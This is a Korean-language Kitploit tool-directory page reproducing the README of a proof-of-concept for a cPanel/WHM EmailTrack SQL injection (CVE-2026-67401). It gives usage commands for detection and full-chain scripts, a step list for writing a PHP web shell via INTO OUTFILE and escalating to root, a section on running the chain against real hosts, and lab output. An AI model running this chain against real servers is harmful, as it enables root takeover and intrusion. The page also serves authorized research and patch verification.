Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-67401 — CVE-2026-67401에 대한 개념 증명으로, cPanel/WHM EmailTrack SQL 인젝션을 통해 임의 파일 쓰기 및 root RCE가 가능하며, SQLi 탐지 프로브와 자체 포함된 취약한 랩을 제공합니다. | Kitploit
도구/GitHubGitHub/imbas007/cve-2026-67401
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubimbas007/cve-2026-67401

CVE-2026-67401

CVE-2026-67401에 대한 개념 증명으로, cPanel/WHM EmailTrack SQL 인젝션을 통해 임의 파일 쓰기 및 root RCE가 가능하며, SQLi 탐지 프로브와 자체 포함된 취약한 랩을 제공합니다.

저장소 보기
3시간 58분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-67401 — cPanel/WHM EmailTrack SQL 인젝션 → 루트 RCE

CVE Severity Platform Python

CVE-2026-67401에 대한 개념 증명(PoC)으로, cPanel & WHM의 EmailTrack 기능에 존재하는 치명적인 SQL 인젝션 취약점입니다. 메일 관련 권한을 가진 인증된 사용자가 임의 파일을 쓰고 root 권한으로 코드를 실행할 수 있습니다.

발견자: Ali Mustafa 공개일: 2026년 9월 8일 구성 요소: EmailTrack (이메일 전송 로깅 / 추적)


영향받는 버전

수정된 빌드 이하 버전이 취약합니다.

cPanel 빌드 시리즈수정 버전
11.11011.110.0.143
11.13411.134.0.55
11.13611.136.0.39
11.13811.138.0.4
WP2 (11.138)11.138.1.9

다음 명령으로 버전을 확인하세요:

root@kitploit:~
cat /usr/local/cpanel/version

익스플로잇 체인

root@kitploit:~
┌─────────────┐      ┌────────────┐      ┌─────────┐      ┌──────────┐
│ Auth as     │ ───► │ SQLi in    │ ───► │ INTO    │ ───► │ RCE as   │
│ cPanel user │      │ EmailTrack │      │ OUTFILE │      │ root     │
│ (mail priv) │      │ API call   │      │ (shell) │      │          │
└─────────────┘      └────────────┘      └─────────┘      └──────────┘
  1. 메일 권한을 가진 계정으로 cPanel에 인증합니다.
  2. EmailTrack account 파라미터를 통해 인젝션합니다.
  3. SELECT ... INTO OUTFILE로 PHP 웹 셸을 public_html/에 기록합니다.
  4. 셸을 통해 명령을 실행합니다.
  5. cPanel의 SUID 바이너리, cron, 또는 작업 큐를 통해 권한 상승합니다.

저장소 내용

파일설명
poc_sqli.pySQL 인젝션 탐지: 불리언 기반, 시간 기반, UNION 컬럼 수
poc_full_chain.py전체 익스플로잇 체인: SQLi → INTO OUTFILE 웹 셸 → RCE → 루트 권한 상승 안내
lab/vuln_server.py취약한 EmailTrack 백엔드의 로컬 시뮬레이션 (안전하고 자체 포함)
README.md이 문서

포함된 랩을 사용하면 실제 cPanel 서버 없이 전체 체인을 실행하고 검증할 수 있습니다.


요구 사항

  • Python 3.8+
  • 서드파티 패키지 불필요 — 모든 것이 표준 라이브러리를 사용합니다.

사용법

모든 명령은 저장소 루트에서 실행합니다.

1. 로컬 랩 실행

root@kitploit:~
python3 lab/vuln_server.py 18123 lab/htdocs
  • 자격 증명: alice / s3cr1t
  • 에뮬레이션: UAPI 로그인, 취약한 EmailTrack 쿼리, SLEEP(), INTO OUTFILE, PHP 웹 셸 실행.
  • 인수 1: 포트 (기본값 18123)
  • 인수 2: 문서 루트 (기본값 lab/htdocs)

한 터미널에서 이 프로세스를 실행한 채로 두고, 두 번째 터미널에서 PoC를 사용하세요.

2. SQL 인젝션 탐지

root@kitploit:~
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode detect
인수설명
-H, --hostcPanel 호스트, 예: https://cp.example.com:2083
-u, --username메일 권한을 가진 cPanel 계정
-p, --password계정 비밀번호
--param인젝션 가능한 파라미터 (기본값: account)
--modedetect (기본값), boolean, timing, union, 또는 all
--sleep타이밍 프로브용 SLEEP() 지속 시간 (기본값: 3.0)
--dump-versionUNION을 통해 DBMS 버전 추출 시도
--insecureTLS 인증서 검증 건너뛰기

특정 프로브 실행:

root@kitploit:~
# UNION column count only
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode union

# Time-based only, 5-second delay
python3 poc_sqli.py -H http://127.0.0.1:18123 -u alice -p 's3cr1t' --mode timing --sleep 5

3. 전체 익스플로잇 체인

root@kitploit:~
CPANEL_USER=alice CPANEL_PASS='s3cr1t' \
  python3 poc_full_chain.py http://127.0.0.1:18123 \
  --shell-base http://127.0.0.1:18123
인수 / 환경 변수설명
host (위치 인수)cPanel 호스트, 또는 환경 변수 CPANEL_HOST 설정
CPANEL_USER메일 권한을 가진 cPanel 계정
CPANEL_PASS계정 비밀번호
--shell-basepublic_html을 제공하는 기본 URL (웹 셸에 도달하는 위치)
--insecureTLS 인증서 검증 건너뛰기
--no-escalateRCE 후 중지; 루트 권한 상승 안내 건너뛰기
SHELL_NAME (환경 변수)웹 셸 파일명 (기본값: .mail.cache.php)

자동으로 실행되는 단계:

  1. cPanel에 인증
  2. SQL 인젝션 확인 (불리언 + 시간 기반)
  3. UNION을 통해 쿼리의 컬럼 수 확인
  4. SELECT ... INTO OUTFILE로 PHP 웹 셸 기록
  5. 셸을 통해 명령 실행 (id, whoami, SUID 열거, …)
  6. 루트 권한 상승 안내 출력 (SUID whmapi1, cron, 작업 큐)

4. 실제 대상 공격

root@kitploit:~
# Detection
python3 poc_sqli.py -H https://cp.example.com:2083 -u user -p 'pass' \
  --insecure --mode detect

# Full chain (--shell-base is the account's web host, not the cPanel port)
CPANEL_USER=user CPANEL_PASS='pass' \
  python3 poc_full_chain.py https://cp.example.com:2083 \
  --shell-base https://cp.example.com --insecure

참고: 기본 --shell-base는 호스트에서 cPanel 전용 포트(2082/2083)를 제거합니다. 문서 루트가 다른 포트에서 제공되는 경우 명시적으로 설정하세요.


검증된 결과

포함된 랩에 대해 생성된 출력:

root@kitploit:~
  CVE-2026-67401  cPanel/WHM EmailTrack SQLi -> File Write -> RCE
  version 1.0

  target: http://127.0.0.1:18123
  user:   alice
  [+] authenticated
  [1] confirming SQL injection in EmailTrack `account`
  [+] boolean-based SQLi CONFIRMED
  [+] time-based SQLi CONFIRMED (SLEEP(2) -> 6.0s)
  [2] determining column count via UNION
  [+] target query has 5 columns
  [3] writing PHP web shell via SELECT ... INTO OUTFILE
  [+] shell written -> /home/alice/public_html/.mail.cache.php
  [4] executing commands through the web shell
  [+] id -> uid=1000(x) gid=1000(x) ...

참고 자료

  • Critical cPanel SQL Injection Lets Attackers Grab Root Access — The Daily Tech Feed
  • cPanel Security Advisory: CVE-2026-67401
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command

라이선스

교육 및 승인된 보안 연구 목적으로 공개되었습니다. 사용 전에 면책 조항을 확인하세요.

도구 다운로드